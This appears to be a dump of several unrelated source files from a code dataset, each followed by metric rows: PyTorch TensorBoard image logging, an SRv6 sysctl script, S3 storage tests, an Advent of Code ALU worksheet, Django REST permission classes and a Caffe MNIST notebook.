subset + '_step_' + str(epoch) + '/diff_' + str(abs(outputs[h] - targets[h])) + '_d_/gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_d_all, global_step=epoch, dataformats='CHW')
def add_gl_image_index(images, patches, outputs, targets, writer, subset, epoch,index):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/g_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_g_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/l_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_l_all, global_step=epoch,
dataformats='CHW')
def add_gld_image_index(images, patches, details, outputs, targets, writer, subset, epoch,index):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_d = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_d.append(details[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_d = [x for x in data_d]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_d = torch.cat(data_d, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_d_all = torchvision.utils.make_grid(data_d, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/g_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_g_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/l_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_l_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch) + '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(
index) + '/d_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_d_all, global_step=epoch,
dataformats='CHW')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
| 51.321101 | 220 | 0.586074 | 1,512 | 11,188 | 4.125661 | 0.080026 | 0.028855 | 0.03655 | 0.057711 | 0.882975 | 0.880571 | 0.873677 | 0.863097 | 0.847227 | 0.847227 | 0 | 0.007375 | 0.24857 | 11,188 | 217 | 221 | 51.557604 | 0.734626 | 0.05926 | 0 | 0.702247 | 0 | 0 | 0.045394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073034 | false | 0 | 0.022472 | 0 | 0.117978 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7147ddf388272f77df8e5b82feaafae0f45ab050 | 206 | py | Python | utilss/layers.py | EliotZhu/CDSM | 69d8ba69202300b5d520ee25298d3d697b8f31f1 | [
"MIT"
] | 3 | 2021-03-11T08:34:24.000Z | 2021-07-19T06:53:02.000Z | utilss/layers.py | EliotZhu/CDSM | 69d8ba69202300b5d520ee25298d3d697b8f31f1 | [
"MIT"
] | null | null | null | utilss/layers.py | EliotZhu/CDSM | 69d8ba69202300b5d520ee25298d3d697b8f31f1 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Masking, Layer
from tensorflow.keras import initializers
| 18.727273 | 64 | 0.834951 | 27 | 206 | 6.148148 | 0.592593 | 0.253012 | 0.343373 | 0.301205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131068 | 206 | 10 | 65 | 20.6 | 0.927374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
715d9803814ffaca8f731f20bbb18bcf26f1be62 | 236 | py | Python | transparentemail/services/__init__.py | fossabot/TransparentEmail | 64f364e0f09f84502609650efd727ddd7efa285a | [
"MIT"
] | 5 | 2021-08-09T08:16:55.000Z | 2022-02-08T16:56:53.000Z | transparentemail/services/__init__.py | fossabot/TransparentEmail | 64f364e0f09f84502609650efd727ddd7efa285a | [
"MIT"
] | 1 | 2021-08-07T07:45:52.000Z | 2021-08-07T07:45:52.000Z | transparentemail/services/__init__.py | fossabot/TransparentEmail | 64f364e0f09f84502609650efd727ddd7efa285a | [
"MIT"
] | 1 | 2021-08-07T07:43:54.000Z | 2021-08-07T07:43:54.000Z | from transparentemail.services.www33MailCom import Www33MailCom
from transparentemail.services.gmailCom import GmailCom
from transparentemail.services.yahooCom import YahooCom
from transparentemail.services.outlookCom import OutlookCom
| 47.2 | 63 | 0.898305 | 24 | 236 | 8.833333 | 0.333333 | 0.377358 | 0.528302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018182 | 0.067797 | 236 | 4 | 64 | 59 | 0.945455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
71b8b3007a11569a19a8e364f2e1fb851166c823 | 739 | py | Python | projects/frr_dev_4node/docker/enable_seg6_router.py | slankdev/tine | 7901b07f4a5e574a4c8782517d63add666e98e20 | [
"Apache-2.0"
] | 31 | 2019-02-22T10:06:18.000Z | 2022-02-28T10:59:31.000Z | projects/frr_dev_4node/docker/enable_seg6_router.py | slankdev/goodns | 7901b07f4a5e574a4c8782517d63add666e98e20 | [
"Apache-2.0"
] | 5 | 2018-12-23T12:34:27.000Z | 2019-12-11T09:25:30.000Z | projects/frr_dev_4node/docker/enable_seg6_router.py | slankdev/goodns | 7901b07f4a5e574a4c8782517d63add666e98e20 | [
"Apache-2.0"
] | 6 | 2018-12-28T00:05:05.000Z | 2020-10-10T14:10:25.000Z | #!/usr/bin/env python3
import os
print('#!/bin/sh')
print('sysctl -w net.ipv6.conf.all.forwarding=1')
print('sysctl -w net.ipv6.conf.all.disable_ipv6=0')
print('sysctl -w net.ipv6.conf.all.seg6_enabled=1')
print('sysctl -w net.ipv4.conf.all.rp_filter=0')
print('sysctl -w net.ipv6.conf.default.forwarding=1')
print('sysctl -w net.ipv6.conf.default.disable_ipv6=0')
print('sysctl -w net.ipv6.conf.default.seg6_enabled=1')
print('sysctl -w net.ipv4.conf.default.rp_filter=0')
ifs = os.listdir(path='/sys/class/net')
for iface in ifs:
print('sysctl -w net.ipv6.conf.{}.disable_ipv6=0'.format(iface))
print('sysctl -w net.ipv6.conf.{}.seg6_enabled=1'.format(iface))
print('sysctl -w net.ipv4.conf.{}.rp_filter=0'.format(iface))
| 36.95 | 68 | 0.717185 | 131 | 739 | 3.977099 | 0.251908 | 0.232246 | 0.253359 | 0.316699 | 0.721689 | 0.721689 | 0.547025 | 0.472169 | 0.268714 | 0 | 0 | 0.04271 | 0.081191 | 739 | 19 | 69 | 38.894737 | 0.724595 | 0.028417 | 0 | 0 | 0 | 0 | 0.678322 | 0.492308 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0.8 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
e08fde76a90b5aebaa6f11db7bf7adc369bea35c | 7,015 | py | Python | tests.py | logston/py3s3 | 1910ca60c53a53d839d6f7b09c05b555f3bfccf4 | [
"BSD-3-Clause"
] | 1 | 2018-06-09T14:00:41.000Z | 2018-06-09T14:00:41.000Z | tests.py | logston/py3s3 | 1910ca60c53a53d839d6f7b09c05b555f3bfccf4 | [
"BSD-3-Clause"
] | null | null | null | tests.py | logston/py3s3 | 1910ca60c53a53d839d6f7b09c05b555f3bfccf4 | [
"BSD-3-Clause"
] | null | null | null | import datetime
import os
import time
import unittest
from py3s3.storage import S3ContentFile
from py3s3.storage import S3IOError
from py3s3.storage import S3Storage
# Target bucket and AWS credentials for the live-S3 integration tests,
# read from the environment; each falls back to None when unset.
BUCKET = os.getenv('AWS_S3_BUCKET', None)
AWS_ACCESS_KEY = os.getenv('AWS_S3_ACCESS_KEY', None)
AWS_SECRET_KEY = os.getenv('AWS_S3_SECRET_KEY', None)
class Py3s3S3StorageTestCase(unittest.TestCase):
    """Round-trip integration tests for S3Storage with no name prefix.

    NOTE(review): the numeric infixes (test__000, __101, __102, ...)
    exploit unittest's alphabetical execution order to run HEAD-miss,
    PUT, HEAD-hit, size/mtime/media-type checks, GET and DELETE as one
    sequence against a single object in the real bucket — the tests are
    order-dependent by design and require live S3 credentials.
    """

    @classmethod
    def setUpClass(cls):
        # Timestamp baked into the uploaded content; modify_time_dt is
        # written by the PUT test and read by the modified-time test.
        cls.datetime = datetime.datetime.now()
        cls.modify_time_dt = None

    def setUp(self):
        self.test_content = ''.join([
            'This test content file was uploaded at about ',
            str(self.datetime)
        ])
        self.test_file_name = '/testdir/test.txt'
        self.file = S3ContentFile(self.test_content, self.test_file_name, '')
        # Empty first argument = no name prefix on stored keys.
        self.storage = S3Storage('', BUCKET, AWS_ACCESS_KEY, AWS_SECRET_KEY)

    def test__000_get_available_name(self):
        # TODO
        pass

    def test__000_get_content_type(self):
        self.assertEqual(self.storage._get_content_type(self.file), 'text/plain')

    def test__101_HEAD_returns_test_file_existance(self):
        # Object must not exist before the PUT test uploads it.
        self.assertFalse(self.storage.exists(self.test_file_name))

    def test__102_PUT_saves_test_file_to_s3(self):
        name = self.storage._save(self.test_file_name, self.file)
        self.assertEqual(name, self.test_file_name)
        # Record the upload time for the modified-time check below.
        self.__class__.modify_time_dt = datetime.datetime.utcnow()

    def test__301_HEAD_returns_test_file_existance(self):
        self.assertTrue(self.storage.exists(self.test_file_name))

    def test__302_HEAD_returns_correct_file_size(self):
        size = self.storage.size(self.test_file_name)
        self.assertEqual(size, self.file.size)

    def test__303_HEAD_returns_correct_modified_time(self):
        time_ = self.storage.modified_time(self.test_file_name)
        # Allow up to a minute of skew between local clock and S3.
        self.assertAlmostEqual(
            time_, self.__class__.modify_time_dt,
            delta=datetime.timedelta(seconds=60)
        )

    def test__304_HEAD_returns_correct_media_type(self):
        headers = self.storage._get_response_headers(self.test_file_name)
        self.assertEqual(headers['Content-Type'], 'text/plain')

    def test__501_GET_pulls_test_file_down(self):
        file = self.storage._open(self.test_file_name)
        self.assertEqual(self.file.content, file.content)

    def test__701_DELETE_deletes_test_file_from_s3(self):
        self.storage.delete(self.test_file_name)
        self.assertFalse(self.storage.exists(self.test_file_name))
class Py3s3S3StorageWithNamePrefixTestCase(unittest.TestCase):
    """Same live-S3 round-trip sequence, but with a 'static' name prefix.

    NOTE(review): order-dependent like Py3s3S3StorageTestCase — the
    numeric method infixes make unittest run PUT before the HEAD/GET/
    DELETE checks.  Requires live S3 credentials from the environment.
    """

    @classmethod
    def setUpClass(cls):
        # modify_time_dt is written by the PUT test, read by __303.
        cls.datetime = datetime.datetime.now()
        cls.modify_time_dt = None

    def setUp(self):
        self.test_content = ''.join([
            'This test content file was uploaded at about ',
            str(self.datetime)
        ])
        self.test_file_name = '/testdir/test.txt'
        self.file = S3ContentFile(self.test_content, self.test_file_name, '')
        # 'static' prefix: keys are stored under the static/ namespace.
        self.storage = S3Storage('static', BUCKET, AWS_ACCESS_KEY, AWS_SECRET_KEY)

    def test__000_get_available_name(self):
        # TODO
        pass

    def test__000_get_content_type(self):
        self.assertEqual(self.storage._get_content_type(self.file), 'text/plain')

    def test__101_HEAD_returns_test_file_existance(self):
        self.assertFalse(self.storage.exists(self.test_file_name))

    def test__102_PUT_saves_test_file_to_s3(self):
        name = self.storage._save(self.test_file_name, self.file)
        self.assertEqual(name, self.test_file_name)
        self.__class__.modify_time_dt = datetime.datetime.utcnow()

    def test__301_HEAD_returns_test_file_existance(self):
        self.assertTrue(self.storage.exists(self.test_file_name))

    def test__302_HEAD_returns_correct_file_size(self):
        size = self.storage.size(self.test_file_name)
        self.assertEqual(size, self.file.size)

    def test__303_HEAD_returns_correct_modified_time(self):
        time_ = self.storage.modified_time(self.test_file_name)
        # Allow up to a minute of skew between local clock and S3.
        self.assertAlmostEqual(
            time_, self.__class__.modify_time_dt,
            delta=datetime.timedelta(seconds=60)
        )

    def test__304_HEAD_returns_correct_media_type(self):
        headers = self.storage._get_response_headers(self.test_file_name)
        self.assertEqual(headers['Content-Type'], 'text/plain')

    def test__501_GET_pulls_test_file_down(self):
        file = self.storage._open(self.test_file_name)
        self.assertEqual(self.file.content, file.content)

    def test__701_DELETE_deletes_test_file_from_s3(self):
        self.storage.delete(self.test_file_name)
        self.assertFalse(self.storage.exists(self.test_file_name))
class Py3s3S3StorageLargeFileSizeTestCase(unittest.TestCase):
    """Live-S3 round-trip sequence using a large (multi-hundred-KB) body.

    NOTE(review): identical order-dependent sequence to the other two
    cases; the payload is ~200k newline-separated integers so that the
    size/GET checks exercise a large upload.
    """

    @classmethod
    def setUpClass(cls):
        # modify_time_dt is written by the PUT test, read by __303.
        cls.datetime = datetime.datetime.now()
        cls.modify_time_dt = None

    def setUp(self):
        # Large payload: a timestamp line followed by 200000 numbers.
        self.test_content = '\n'.join([
            'This test content file was uploaded at about {}'.format(self.datetime),
            '\n'.join(str(n) for n in range(200000))
        ])
        self.test_file_name = '/testdir/large_test.txt'
        self.file = S3ContentFile(self.test_content, self.test_file_name, '')
        self.storage = S3Storage('', BUCKET, AWS_ACCESS_KEY, AWS_SECRET_KEY)

    def test__000_get_available_name(self):
        # TODO
        pass

    def test__000_get_content_type(self):
        self.assertEqual(self.storage._get_content_type(self.file), 'text/plain')

    def test__101_HEAD_returns_test_file_existance(self):
        self.assertFalse(self.storage.exists(self.test_file_name))

    def test__102_PUT_saves_test_file_to_s3(self):
        name = self.storage._save(self.test_file_name, self.file)
        self.assertEqual(name, self.test_file_name)
        self.__class__.modify_time_dt = datetime.datetime.utcnow()

    def test__301_HEAD_returns_test_file_existance(self):
        self.assertTrue(self.storage.exists(self.test_file_name))

    def test__302_HEAD_returns_correct_file_size(self):
        size = self.storage.size(self.test_file_name)
        self.assertEqual(size, self.file.size)

    def test__303_HEAD_returns_correct_modified_time(self):
        time_ = self.storage.modified_time(self.test_file_name)
        # Allow up to a minute of skew between local clock and S3.
        self.assertAlmostEqual(
            time_, self.__class__.modify_time_dt,
            delta=datetime.timedelta(seconds=60)
        )

    def test__304_HEAD_returns_correct_media_type(self):
        headers = self.storage._get_response_headers(self.test_file_name)
        self.assertEqual(headers['Content-Type'], 'text/plain')

    def test__501_GET_pulls_test_file_down(self):
        file = self.storage._open(self.test_file_name)
        self.assertEqual(self.file.content, file.content)

    def test__701_DELETE_deletes_test_file_from_s3(self):
        self.storage.delete(self.test_file_name)
        self.assertFalse(self.storage.exists(self.test_file_name))
if __name__ == '__main__':
unittest.main() | 37.31383 | 84 | 0.714469 | 940 | 7,015 | 4.917021 | 0.106383 | 0.088273 | 0.093466 | 0.124621 | 0.915188 | 0.903289 | 0.903289 | 0.903289 | 0.903289 | 0.894418 | 0 | 0.023697 | 0.187883 | 7,015 | 188 | 85 | 37.31383 | 0.787608 | 0.001996 | 0 | 0.836879 | 0 | 0 | 0.050729 | 0.003287 | 0 | 0 | 0 | 0.005319 | 0.191489 | 1 | 0.255319 | false | 0.021277 | 0.049645 | 0 | 0.326241 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e0a46ea366ba21eda4cb6e7dcf99acc21e052b54 | 183 | py | Python | runai/utils/__init__.py | run-ai/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 86 | 2020-01-23T18:56:41.000Z | 2022-02-14T22:32:08.000Z | runai/utils/__init__.py | Raghvender1205/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 18 | 2020-01-24T17:55:18.000Z | 2021-12-01T01:01:32.000Z | runai/utils/__init__.py | Raghvender1205/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 12 | 2020-02-03T14:30:44.000Z | 2022-01-08T16:06:59.000Z | from .attribute import Attribute
from .flock import Flock
from .hook import Hook
from . import attribute
from . import flock
from . import log
from . import random
from . import gpus
| 20.333333 | 32 | 0.781421 | 27 | 183 | 5.296296 | 0.296296 | 0.34965 | 0.265734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174863 | 183 | 8 | 33 | 22.875 | 0.94702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e0a4bd882720894ecf623dec246d87938e56d18b | 5,472 | py | Python | day24/worksheet.py | tomp/AOC-2021 | aaf96c0f679c31eeaa0884dc94ce3b55c5cf190e | [
"MIT"
] | null | null | null | day24/worksheet.py | tomp/AOC-2021 | aaf96c0f679c31eeaa0884dc94ce3b55c5cf190e | [
"MIT"
] | null | null | null | day24/worksheet.py | tomp/AOC-2021 | aaf96c0f679c31eeaa0884dc94ce3b55c5cf190e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# AoC 2021 day 24: hand-unrolled trace of the MONAD ALU program.
#
# The original listing was 14 copy-pasted, near-identical blocks; each
# block differs only in three constants:
#   z_div -- divisor applied to z ("pop" steps use 26, "push" steps 1)
#   x_add -- offset added to (z % 26) before comparing with the digit
#   y_add -- offset added to the digit before it is pushed onto z
# A model number is valid when z == 0 after all 14 digits are consumed.
#
# Earlier candidates tried during the manual search (each reassignment
# in the original shadowed the previous one, so only the last counted):
#   [1,3,5,7,9,2,4,6,8,9,9,9,9,9], [1,3,5,2,9,2,4,6,8,9,9,9,9,9],
#   [1,3,5,2,9,2,5,6,8,9,9,9,9,9], [1,3,5,2,7,2,5,9,8,9,9,9,9,9],
#   [1,3,5,2,7,2,5,9,8,3,9,9,9,9], [1,1,5,2,7,2,5,9,8,3,9,8,8,9]
inp = [9, 1, 5, 2, 7, 2, 5, 9, 8, 3, 9, 8, 8, 1]

# (z_div, x_add, y_add) for steps @1 .. @14, extracted from the listing.
STEPS = [
    (1, 11, 3),
    (1, 14, 7),
    (1, 13, 1),
    (26, -4, 6),
    (1, 11, 14),
    (1, 10, 7),
    (26, -4, 9),
    (26, -12, 9),
    (1, 10, 6),
    (26, -11, 4),
    (1, 12, 0),
    (26, -1, 7),
    (26, 0, 12),
    (26, -11, 1),
]

w, x, y, z = 0, 0, 0, 0
step = 0


def print_state(step, w, x, y, z):
    # Dump the ALU registers after the (step+1)-th digit is processed.
    print(f"@{step+1:-2d} w:{w:-2d} x:{x:-2d} y:{y:-2d} z:{z:-2d}")


for z_div, x_add, y_add in STEPS:
    w = inp[step]
    # x == 1 iff the value on top of the base-26 stack z does not
    # "match" the current digit; x is computed before z is divided.
    x = int(((z % 26) + x_add) != w)
    if z_div == 26:
        z = z // 26  # "pop" one base-26 digit off z
    y = 25 * x + 1
    z = z * (25 * x + 1)
    y = (w + y_add) * x
    z = z + (w + y_add) * x  # "push" (w + y_add) when the match failed
    print_state(step, w, x, y, z)
    step += 1
| 11.213115 | 71 | 0.438962 | 1,421 | 5,472 | 1.679803 | 0.026742 | 0.093842 | 0.058651 | 0.093842 | 0.938416 | 0.938416 | 0.935484 | 0.927943 | 0.902807 | 0.901969 | 0 | 0.145512 | 0.360746 | 5,472 | 487 | 72 | 11.23614 | 0.536878 | 0.395651 | 0 | 0.790698 | 0 | 0.007752 | 0.018762 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007752 | false | 0 | 0 | 0 | 0.007752 | 0.124031 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
46190f565977783336f3d3a58429ad66c4f88fbb | 106 | py | Python | backend/scripts/starter.py | Doarakko/kagoole | b0657099335c76af9b8d4bbc3311a52daebcbb5a | [
"MIT"
] | 9 | 2019-07-29T09:46:12.000Z | 2021-11-15T10:29:33.000Z | backend/scripts/starter.py | Doarakko/kagoole | b0657099335c76af9b8d4bbc3311a52daebcbb5a | [
"MIT"
] | 49 | 2019-07-26T15:02:07.000Z | 2022-02-18T06:31:18.000Z | backend/scripts/starter.py | Doarakko/kagoole | b0657099335c76af9b8d4bbc3311a52daebcbb5a | [
"MIT"
] | 2 | 2019-07-30T00:06:24.000Z | 2020-03-22T19:22:56.000Z | from scripts.batch import save_competitions
def run():
    """Script entry point (django-extensions ``runscript`` convention).

    Saves competitions starting from page 1 with ``in_progress=False``
    — presumably restricting the crawl to finished competitions; confirm
    against scripts.batch.save_competitions.
    """
    save_competitions(page=1, in_progress=False)
| 17.666667 | 48 | 0.783019 | 15 | 106 | 5.333333 | 0.866667 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01087 | 0.132075 | 106 | 5 | 49 | 21.2 | 0.858696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1cfea7512e2b88651d5accd82afa648e49ada701 | 1,396 | py | Python | api_yamdb/api/permissions.py | LHLHLHE/api_yamdb | bda83815a47f3fda03d54220dfe41e9263ff1b05 | [
"MIT"
] | null | null | null | api_yamdb/api/permissions.py | LHLHLHE/api_yamdb | bda83815a47f3fda03d54220dfe41e9263ff1b05 | [
"MIT"
] | null | null | null | api_yamdb/api/permissions.py | LHLHLHE/api_yamdb | bda83815a47f3fda03d54220dfe41e9263ff1b05 | [
"MIT"
] | null | null | null | from rest_framework import permissions
class AdminPermission(permissions.BasePermission):
    """Grant both view- and object-level access only to authenticated
    users flagged as admins."""

    def has_permission(self, request, view):
        user = request.user
        return user.is_authenticated and user.is_admin

    def has_object_permission(self, request, view, obj):
        user = request.user
        return user.is_authenticated and user.is_admin
class ForMePermission(permissions.BasePermission):
    """Allow detail-style actions only when the URL targets the special
    'me' username (i.e. the caller's own record)."""

    # Actions an authenticated user may perform on their own record.
    _DETAIL_ACTIONS = ('retrieve', 'update', 'partial_update', 'destroy')

    def has_permission(self, request, view):
        if not request.user.is_authenticated:
            return False
        return view.action in self._DETAIL_ACTIONS

    def has_object_permission(self, request, view, obj):
        return view.kwargs['username'] == 'me'
class ReadOnlyPermission(permissions.BasePermission):
    """Permit only safe (read-only) HTTP methods, at both the view and
    the object level."""

    def has_permission(self, request, view):
        is_read_only = request.method in permissions.SAFE_METHODS
        return is_read_only

    def has_object_permission(self, request, view, obj):
        is_read_only = request.method in permissions.SAFE_METHODS
        return is_read_only
class CreateAndUpdatePermission(permissions.BasePermission):
    """Any authenticated user may access the view; per-object access is
    reserved for moderators and the object's author."""

    def has_permission(self, request, view):
        return request.user.is_authenticated

    def has_object_permission(self, request, view, obj):
        user = request.user
        return user.is_moderator or obj.author == user
| 31.727273 | 60 | 0.655444 | 145 | 1,396 | 6.151724 | 0.275862 | 0.053812 | 0.188341 | 0.224215 | 0.748879 | 0.748879 | 0.748879 | 0.681614 | 0.681614 | 0.630045 | 0 | 0 | 0.26361 | 1,396 | 43 | 61 | 32.465116 | 0.867704 | 0 | 0 | 0.535714 | 0 | 0 | 0.032235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.035714 | 0.285714 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
e81352232e4e5838446698c59ca3e3560369d489 | 25,896 | py | Python | _data/write_net_info.py | Gxllii/Gxllii.github.io | ecd5d410153e4f4ca01721f47a3665cf1ce5e0de | [
"MIT"
] | null | null | null | _data/write_net_info.py | Gxllii/Gxllii.github.io | ecd5d410153e4f4ca01721f47a3665cf1ce5e0de | [
"MIT"
] | null | null | null | _data/write_net_info.py | Gxllii/Gxllii.github.io | ecd5d410153e4f4ca01721f47a3665cf1ce5e0de | [
"MIT"
] | null | null | null |
# coding: utf-8
# In[1]:
# Notebook-exported setup cell (Python 2 / pycaffe): configure the path
# to a local Caffe checkout and load the trained LeNet with batch size 1.
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
get_ipython().magic(u'matplotlib inline')

caffe_root = '../'  # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
import caffe

model_def = caffe_root + '/examples/mnist/lenet_batch1.prototxt'
model_weights = caffe_root + '/examples/mnist/lenet_iter_10000.caffemodel'
net = caffe.Net(model_def,      # defines the structure of the model
                model_weights,  # contains the trained weights
                caffe.TEST)     # use test mode (e.g., don't perform dropout)
# In[270]:
# Inspect the first two records of the MNIST test LMDB: decode each
# value into a caffe Datum, reshape to CHW, and display the 28x28 image.
import sys
import numpy as np
import lmdb
import caffe
import argparse
from matplotlib import pyplot

lmdbpath = '/home/liguangli/work/caffe/examples/mnist/mnist_test_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
t = 0
with env.begin() as txn:
    cursor = txn.cursor()
    for key, value in cursor:
        print 'key: ',key
        datum = caffe.proto.caffe_pb2.Datum()  # Datum protobuf message
        datum.ParseFromString(value)  # parse the raw LMDB value into it
        flat_x = np.fromstring(datum.data, dtype=np.uint8)  # to numpy (np.fromstring is deprecated; frombuffer is the modern call)
        x = flat_x.reshape(datum.channels, datum.height, datum.width)
        y = datum.label  # image label
        print flat_x.shape
        print type(flat_x)
        x2 = flat_x.reshape((28,28))
        print y
        fig = pyplot.figure()  # show the decoded digit
        pyplot.imshow(x2, cmap = plt.cm.gray)
        t = t + 1
        if t > 1 :
            break
# In[31]:
# Run one forward pass on GPU with the image loaded above, then list
# the blob/param shapes and layer names of the network.
# copy the image data into the memory allocated for the net
net.blobs['data'].data[...] = x

### perform classification
caffe.set_device(0)
caffe.set_mode_gpu()
output = net.forward()
output_prob = output['prob'][0]  # the output probability vector for the first image in the batch
print 'predicted class is:', output_prob.argmax()

# In[271]:
# for each layer, show the output shape
for layer_name, blob in net.blobs.iteritems():
    print layer_name + '\t' + str(blob.data.shape)

# In[272]:
# (output_channels, input_channels, filter_height, filter_width)
for layer_name, param in net.params.iteritems():
    print layer_name + '\t' + str(param[0].data.shape)

# In[281]:
# list the layer names in network order
for layer in net.layer_dict:
    print layer
#for name in net.bottom_names:
